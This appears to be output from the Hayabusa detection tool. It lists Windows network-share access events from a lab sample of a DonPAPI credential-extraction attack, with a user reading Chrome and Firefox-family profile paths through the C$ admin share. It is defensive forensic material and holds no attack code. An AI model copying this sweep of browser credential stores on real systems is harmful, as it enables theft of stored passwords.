2021-12-12 16:16:03.750 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.766 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.781 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.797 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.813 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.830 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.832 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.835 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.851 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.852 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.868 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.884 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:03.899 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
